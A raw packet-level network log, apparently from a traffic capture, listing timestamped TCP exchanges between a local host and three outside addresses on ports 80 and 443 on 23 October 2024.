                                                                                                                        Oct 23, 2024 08:14:44.690264940 CEST4973280192.168.2.10172.245.135.166
                                                                                                                        Oct 23, 2024 08:14:44.690291882 CEST8049732172.245.135.166192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:44.690336943 CEST4973280192.168.2.10172.245.135.166
                                                                                                                        Oct 23, 2024 08:14:44.690346956 CEST8049732172.245.135.166192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:44.690391064 CEST8049732172.245.135.166192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:44.690395117 CEST4973280192.168.2.10172.245.135.166
                                                                                                                        Oct 23, 2024 08:14:44.690437078 CEST4973280192.168.2.10172.245.135.166
                                                                                                                        Oct 23, 2024 08:14:44.690468073 CEST8049732172.245.135.166192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:44.690517902 CEST4973280192.168.2.10172.245.135.166
                                                                                                                        Oct 23, 2024 08:14:44.690552950 CEST8049732172.245.135.166192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:44.690565109 CEST8049732172.245.135.166192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:44.690596104 CEST4973280192.168.2.10172.245.135.166
                                                                                                                        Oct 23, 2024 08:14:44.690618992 CEST4973280192.168.2.10172.245.135.166
                                                                                                                        Oct 23, 2024 08:14:44.690692902 CEST8049732172.245.135.166192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:44.690732956 CEST4973280192.168.2.10172.245.135.166
                                                                                                                        Oct 23, 2024 08:14:44.691055059 CEST8049732172.245.135.166192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:44.691158056 CEST4973280192.168.2.10172.245.135.166
                                                                                                                        Oct 23, 2024 08:14:44.691169024 CEST8049732172.245.135.166192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:44.691179037 CEST8049732172.245.135.166192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:44.691210032 CEST4973280192.168.2.10172.245.135.166
                                                                                                                        Oct 23, 2024 08:14:44.691485882 CEST8049732172.245.135.166192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:44.691529036 CEST4973280192.168.2.10172.245.135.166
                                                                                                                        Oct 23, 2024 08:14:44.691545010 CEST8049732172.245.135.166192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:44.691555023 CEST8049732172.245.135.166192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:44.691582918 CEST4973280192.168.2.10172.245.135.166
                                                                                                                        Oct 23, 2024 08:14:44.691607952 CEST4973280192.168.2.10172.245.135.166
                                                                                                                        Oct 23, 2024 08:14:44.730865002 CEST8049732172.245.135.166192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:44.730916977 CEST8049732172.245.135.166192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:44.730952978 CEST4973280192.168.2.10172.245.135.166
                                                                                                                        Oct 23, 2024 08:14:44.730973959 CEST4973280192.168.2.10172.245.135.166
                                                                                                                        Oct 23, 2024 08:14:44.730978966 CEST8049732172.245.135.166192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:44.731024981 CEST4973280192.168.2.10172.245.135.166
                                                                                                                        Oct 23, 2024 08:14:44.731040001 CEST8049732172.245.135.166192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:44.731167078 CEST4973280192.168.2.10172.245.135.166
                                                                                                                        Oct 23, 2024 08:14:44.731187105 CEST8049732172.245.135.166192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:44.731195927 CEST8049732172.245.135.166192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:44.731232882 CEST4973280192.168.2.10172.245.135.166
                                                                                                                        Oct 23, 2024 08:14:44.810209036 CEST8049732172.245.135.166192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:44.810225964 CEST8049732172.245.135.166192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:44.810236931 CEST8049732172.245.135.166192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:44.810307980 CEST8049732172.245.135.166192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:44.810317993 CEST8049732172.245.135.166192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:44.810349941 CEST4973280192.168.2.10172.245.135.166
                                                                                                                        Oct 23, 2024 08:14:44.810415030 CEST4973280192.168.2.10172.245.135.166
                                                                                                                        Oct 23, 2024 08:14:44.810446024 CEST8049732172.245.135.166192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:44.810461044 CEST8049732172.245.135.166192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:44.810472012 CEST8049732172.245.135.166192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:44.810498953 CEST4973280192.168.2.10172.245.135.166
                                                                                                                        Oct 23, 2024 08:14:44.810533047 CEST4973280192.168.2.10172.245.135.166
                                                                                                                        Oct 23, 2024 08:14:44.810609102 CEST8049732172.245.135.166192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:44.810657978 CEST4973280192.168.2.10172.245.135.166
                                                                                                                        Oct 23, 2024 08:14:44.811168909 CEST8049732172.245.135.166192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:44.811232090 CEST4973280192.168.2.10172.245.135.166
                                                                                                                        Oct 23, 2024 08:14:44.811281919 CEST8049732172.245.135.166192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:44.811300993 CEST8049732172.245.135.166192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:44.811335087 CEST4973280192.168.2.10172.245.135.166
                                                                                                                        Oct 23, 2024 08:14:44.811359882 CEST4973280192.168.2.10172.245.135.166
                                                                                                                        Oct 23, 2024 08:14:44.811486006 CEST8049732172.245.135.166192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:44.811559916 CEST8049732172.245.135.166192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:44.811618090 CEST4973280192.168.2.10172.245.135.166
                                                                                                                        Oct 23, 2024 08:14:44.850745916 CEST8049732172.245.135.166192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:44.850799084 CEST8049732172.245.135.166192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:44.850810051 CEST8049732172.245.135.166192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:44.850902081 CEST4973280192.168.2.10172.245.135.166
                                                                                                                        Oct 23, 2024 08:14:44.850970984 CEST8049732172.245.135.166192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:44.851016045 CEST8049732172.245.135.166192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:44.851026058 CEST8049732172.245.135.166192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:44.851079941 CEST4973280192.168.2.10172.245.135.166
                                                                                                                        Oct 23, 2024 08:14:44.929763079 CEST8049732172.245.135.166192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:44.929781914 CEST8049732172.245.135.166192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:44.929843903 CEST4973280192.168.2.10172.245.135.166
                                                                                                                        Oct 23, 2024 08:14:44.930047989 CEST8049732172.245.135.166192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:44.930102110 CEST4973280192.168.2.10172.245.135.166
                                                                                                                        Oct 23, 2024 08:14:44.930130959 CEST8049732172.245.135.166192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:44.930143118 CEST8049732172.245.135.166192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:44.930174112 CEST4973280192.168.2.10172.245.135.166
                                                                                                                        Oct 23, 2024 08:14:44.930191994 CEST4973280192.168.2.10172.245.135.166
                                                                                                                        Oct 23, 2024 08:14:44.930260897 CEST8049732172.245.135.166192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:44.930309057 CEST4973280192.168.2.10172.245.135.166
                                                                                                                        Oct 23, 2024 08:14:44.930331945 CEST8049732172.245.135.166192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:44.930346012 CEST8049732172.245.135.166192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:44.930389881 CEST4973280192.168.2.10172.245.135.166
                                                                                                                        Oct 23, 2024 08:14:44.930697918 CEST8049732172.245.135.166192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:44.930752993 CEST4973280192.168.2.10172.245.135.166
                                                                                                                        Oct 23, 2024 08:14:44.930906057 CEST8049732172.245.135.166192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:44.930917025 CEST8049732172.245.135.166192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:44.930953026 CEST4973280192.168.2.10172.245.135.166
                                                                                                                        Oct 23, 2024 08:14:44.970571995 CEST8049732172.245.135.166192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:44.970638037 CEST8049732172.245.135.166192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:44.970644951 CEST4973280192.168.2.10172.245.135.166
                                                                                                                        Oct 23, 2024 08:14:44.970650911 CEST8049732172.245.135.166192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:44.970681906 CEST4973280192.168.2.10172.245.135.166
                                                                                                                        Oct 23, 2024 08:14:44.970757008 CEST4973280192.168.2.10172.245.135.166
                                                                                                                        Oct 23, 2024 08:14:44.970771074 CEST8049732172.245.135.166192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:44.970783949 CEST8049732172.245.135.166192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:44.970803976 CEST4973280192.168.2.10172.245.135.166
                                                                                                                        Oct 23, 2024 08:14:44.970809937 CEST8049732172.245.135.166192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:44.970827103 CEST4973280192.168.2.10172.245.135.166
                                                                                                                        Oct 23, 2024 08:14:44.970851898 CEST4973280192.168.2.10172.245.135.166
                                                                                                                        Oct 23, 2024 08:14:44.971158028 CEST8049732172.245.135.166192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:44.971210957 CEST8049732172.245.135.166192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:44.971223116 CEST8049732172.245.135.166192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:44.971261024 CEST4973280192.168.2.10172.245.135.166
                                                                                                                        Oct 23, 2024 08:14:44.971282959 CEST4973280192.168.2.10172.245.135.166
                                                                                                                        Oct 23, 2024 08:14:45.049902916 CEST8049732172.245.135.166192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:45.049956083 CEST8049732172.245.135.166192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:45.049966097 CEST8049732172.245.135.166192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:45.049998045 CEST4973280192.168.2.10172.245.135.166
                                                                                                                        Oct 23, 2024 08:14:45.050035954 CEST4973280192.168.2.10172.245.135.166
                                                                                                                        Oct 23, 2024 08:14:45.050101995 CEST8049732172.245.135.166192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:45.050173044 CEST4973280192.168.2.10172.245.135.166
                                                                                                                        Oct 23, 2024 08:14:45.050173998 CEST8049732172.245.135.166192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:45.050187111 CEST8049732172.245.135.166192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:45.050215006 CEST4973280192.168.2.10172.245.135.166
                                                                                                                        Oct 23, 2024 08:14:45.050232887 CEST4973280192.168.2.10172.245.135.166
                                                                                                                        Oct 23, 2024 08:14:45.050303936 CEST8049732172.245.135.166192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:45.050354958 CEST4973280192.168.2.10172.245.135.166
                                                                                                                        Oct 23, 2024 08:14:45.050652027 CEST8049732172.245.135.166192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:45.050692081 CEST4973280192.168.2.10172.245.135.166
                                                                                                                        Oct 23, 2024 08:14:45.050770998 CEST8049732172.245.135.166192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:45.050813913 CEST4973280192.168.2.10172.245.135.166
                                                                                                                        Oct 23, 2024 08:14:49.140830040 CEST8049732172.245.135.166192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:49.140889883 CEST4973280192.168.2.10172.245.135.166
                                                                                                                        Oct 23, 2024 08:14:50.381539106 CEST49772443192.168.2.10142.250.186.78
                                                                                                                        Oct 23, 2024 08:14:50.381581068 CEST44349772142.250.186.78192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:50.381851912 CEST49772443192.168.2.10142.250.186.78
                                                                                                                        Oct 23, 2024 08:14:50.391031981 CEST49772443192.168.2.10142.250.186.78
                                                                                                                        Oct 23, 2024 08:14:50.391047955 CEST44349772142.250.186.78192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:51.235874891 CEST44349772142.250.186.78192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:51.236058950 CEST49772443192.168.2.10142.250.186.78
                                                                                                                        Oct 23, 2024 08:14:51.236947060 CEST44349772142.250.186.78192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:51.237725973 CEST49772443192.168.2.10142.250.186.78
                                                                                                                        Oct 23, 2024 08:14:51.240211964 CEST49772443192.168.2.10142.250.186.78
                                                                                                                        Oct 23, 2024 08:14:51.240223885 CEST44349772142.250.186.78192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:51.240447044 CEST44349772142.250.186.78192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:51.250080109 CEST49772443192.168.2.10142.250.186.78
                                                                                                                        Oct 23, 2024 08:14:51.295322895 CEST44349772142.250.186.78192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:51.599386930 CEST44349772142.250.186.78192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:51.603333950 CEST49772443192.168.2.10142.250.186.78
                                                                                                                        Oct 23, 2024 08:14:51.603367090 CEST44349772142.250.186.78192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:51.603485107 CEST44349772142.250.186.78192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:51.603506088 CEST49772443192.168.2.10142.250.186.78
                                                                                                                        Oct 23, 2024 08:14:51.603576899 CEST49772443192.168.2.10142.250.186.78
                                                                                                                        Oct 23, 2024 08:14:51.613939047 CEST49778443192.168.2.10142.250.185.193
                                                                                                                        Oct 23, 2024 08:14:51.613990068 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:51.614242077 CEST49778443192.168.2.10142.250.185.193
                                                                                                                        Oct 23, 2024 08:14:51.614373922 CEST49778443192.168.2.10142.250.185.193
                                                                                                                        Oct 23, 2024 08:14:51.614386082 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:52.467112064 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:52.467204094 CEST49778443192.168.2.10142.250.185.193
                                                                                                                        Oct 23, 2024 08:14:52.469054937 CEST49778443192.168.2.10142.250.185.193
                                                                                                                        Oct 23, 2024 08:14:52.469064951 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:52.469355106 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:52.471072912 CEST49778443192.168.2.10142.250.185.193
                                                                                                                        Oct 23, 2024 08:14:52.511336088 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:53.379020929 CEST4973280192.168.2.10172.245.135.166
                                                                                                                        Oct 23, 2024 08:14:54.811454058 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:54.811572075 CEST49778443192.168.2.10142.250.185.193
                                                                                                                        Oct 23, 2024 08:14:54.820585012 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:54.820760012 CEST49778443192.168.2.10142.250.185.193
                                                                                                                        Oct 23, 2024 08:14:54.928700924 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:54.928796053 CEST49778443192.168.2.10142.250.185.193
                                                                                                                        Oct 23, 2024 08:14:54.928813934 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:54.930933952 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:54.931009054 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:54.931027889 CEST49778443192.168.2.10142.250.185.193
                                                                                                                        Oct 23, 2024 08:14:54.931045055 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:54.931232929 CEST49778443192.168.2.10142.250.185.193
                                                                                                                        Oct 23, 2024 08:14:54.937870026 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:54.945792913 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:54.945825100 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:54.945877075 CEST49778443192.168.2.10142.250.185.193
                                                                                                                        Oct 23, 2024 08:14:54.945895910 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:54.945934057 CEST49778443192.168.2.10142.250.185.193
                                                                                                                        Oct 23, 2024 08:14:55.045803070 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:55.045893908 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:55.045926094 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:55.046030045 CEST49778443192.168.2.10142.250.185.193
                                                                                                                        Oct 23, 2024 08:14:55.046050072 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:55.046123028 CEST49778443192.168.2.10142.250.185.193
                                                                                                                        Oct 23, 2024 08:14:55.046247005 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:55.048372030 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:55.048424959 CEST49778443192.168.2.10142.250.185.193
                                                                                                                        Oct 23, 2024 08:14:55.048437119 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:55.060110092 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:55.060213089 CEST49778443192.168.2.10142.250.185.193
                                                                                                                        Oct 23, 2024 08:14:55.060233116 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:55.063421965 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:55.063709974 CEST49778443192.168.2.10142.250.185.193
                                                                                                                        Oct 23, 2024 08:14:55.063725948 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:55.111345053 CEST49778443192.168.2.10142.250.185.193
                                                                                                                        Oct 23, 2024 08:14:55.334567070 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:55.334629059 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:55.334695101 CEST49778443192.168.2.10142.250.185.193
                                                                                                                        Oct 23, 2024 08:14:55.334719896 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:55.334858894 CEST49778443192.168.2.10142.250.185.193
                                                                                                                        Oct 23, 2024 08:14:55.334923983 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:55.335493088 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:55.335572004 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:55.335623980 CEST49778443192.168.2.10142.250.185.193
                                                                                                                        Oct 23, 2024 08:14:55.335632086 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:55.335908890 CEST49778443192.168.2.10142.250.185.193
                                                                                                                        Oct 23, 2024 08:14:55.335915089 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:55.338263035 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:55.338290930 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:55.338351965 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:55.338376999 CEST49778443192.168.2.10142.250.185.193
                                                                                                                        Oct 23, 2024 08:14:55.338387966 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:55.338429928 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:55.338820934 CEST49778443192.168.2.10142.250.185.193
                                                                                                                        Oct 23, 2024 08:14:55.338820934 CEST49778443192.168.2.10142.250.185.193
                                                                                                                        Oct 23, 2024 08:14:55.338834047 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:55.338841915 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:55.338890076 CEST49778443192.168.2.10142.250.185.193
                                                                                                                        Oct 23, 2024 08:14:55.339042902 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:55.339096069 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:55.339175940 CEST49778443192.168.2.10142.250.185.193
                                                                                                                        Oct 23, 2024 08:14:55.339186907 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:55.339334965 CEST49778443192.168.2.10142.250.185.193
                                                                                                                        Oct 23, 2024 08:14:55.397706985 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:55.400185108 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:55.400233030 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:55.400268078 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:55.400290012 CEST49778443192.168.2.10142.250.185.193
                                                                                                                        Oct 23, 2024 08:14:55.400302887 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:55.400590897 CEST49778443192.168.2.10142.250.185.193
                                                                                                                        Oct 23, 2024 08:14:55.411995888 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:55.414978981 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:55.415018082 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:55.415074110 CEST49778443192.168.2.10142.250.185.193
                                                                                                                        Oct 23, 2024 08:14:55.415098906 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:55.415160894 CEST49778443192.168.2.10142.250.185.193
                                                                                                                        Oct 23, 2024 08:14:55.415257931 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:55.415288925 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:55.415326118 CEST49778443192.168.2.10142.250.185.193
                                                                                                                        Oct 23, 2024 08:14:55.415333033 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:55.416143894 CEST49778443192.168.2.10142.250.185.193
                                                                                                                        Oct 23, 2024 08:14:55.515024900 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:55.515090942 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:55.515207052 CEST49778443192.168.2.10142.250.185.193
                                                                                                                        Oct 23, 2024 08:14:55.515219927 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:55.517488003 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:55.517560959 CEST49778443192.168.2.10142.250.185.193
                                                                                                                        Oct 23, 2024 08:14:55.517570019 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:55.529364109 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:55.529439926 CEST49778443192.168.2.10142.250.185.193
                                                                                                                        Oct 23, 2024 08:14:55.529448032 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:55.532417059 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:55.532507896 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:55.532536030 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:55.532557011 CEST49778443192.168.2.10142.250.185.193
                                                                                                                        Oct 23, 2024 08:14:55.532566071 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:55.532629967 CEST49778443192.168.2.10142.250.185.193
                                                                                                                        Oct 23, 2024 08:14:55.532980919 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:55.533013105 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:55.533123970 CEST49778443192.168.2.10142.250.185.193
                                                                                                                        Oct 23, 2024 08:14:55.533132076 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:55.533212900 CEST49778443192.168.2.10142.250.185.193
                                                                                                                        Oct 23, 2024 08:14:55.632375956 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:55.634721041 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:55.634758949 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:55.634780884 CEST49778443192.168.2.10142.250.185.193
                                                                                                                        Oct 23, 2024 08:14:55.634798050 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:55.634941101 CEST49778443192.168.2.10142.250.185.193
                                                                                                                        Oct 23, 2024 08:14:55.646584988 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:55.661463022 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:55.661500931 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:55.661531925 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:55.661572933 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:55.661604881 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:55.661621094 CEST49778443192.168.2.10142.250.185.193
                                                                                                                        Oct 23, 2024 08:14:55.661649942 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:55.661700010 CEST49778443192.168.2.10142.250.185.193
                                                                                                                        Oct 23, 2024 08:14:55.661806107 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:55.661884069 CEST49778443192.168.2.10142.250.185.193
                                                                                                                        Oct 23, 2024 08:14:55.661902905 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:55.704972982 CEST49778443192.168.2.10142.250.185.193
                                                                                                                        Oct 23, 2024 08:14:55.749718904 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:55.749777079 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:55.749821901 CEST49778443192.168.2.10142.250.185.193
                                                                                                                        Oct 23, 2024 08:14:55.749836922 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:55.752003908 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:55.752094984 CEST49778443192.168.2.10142.250.185.193
                                                                                                                        Oct 23, 2024 08:14:55.752105951 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:55.763987064 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:55.764061928 CEST49778443192.168.2.10142.250.185.193
                                                                                                                        Oct 23, 2024 08:14:55.764074087 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:55.778692007 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:55.778764963 CEST49778443192.168.2.10142.250.185.193
                                                                                                                        Oct 23, 2024 08:14:55.778773069 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:55.778810024 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:55.778877974 CEST49778443192.168.2.10142.250.185.193
                                                                                                                        Oct 23, 2024 08:14:55.778897047 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:55.779258966 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:55.779292107 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:55.779329062 CEST49778443192.168.2.10142.250.185.193
                                                                                                                        Oct 23, 2024 08:14:55.779349089 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:55.780157089 CEST49778443192.168.2.10142.250.185.193
                                                                                                                        Oct 23, 2024 08:14:55.780164003 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:55.829925060 CEST49778443192.168.2.10142.250.185.193
                                                                                                                        Oct 23, 2024 08:14:55.867522001 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:55.869529963 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:55.869551897 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:55.869630098 CEST49778443192.168.2.10142.250.185.193
                                                                                                                        Oct 23, 2024 08:14:55.869647980 CEST44349778142.250.185.193192.168.2.10
                                                                                                                        Oct 23, 2024 08:14:55.869877100 CEST49778443192.168.2.10142.250.185.193
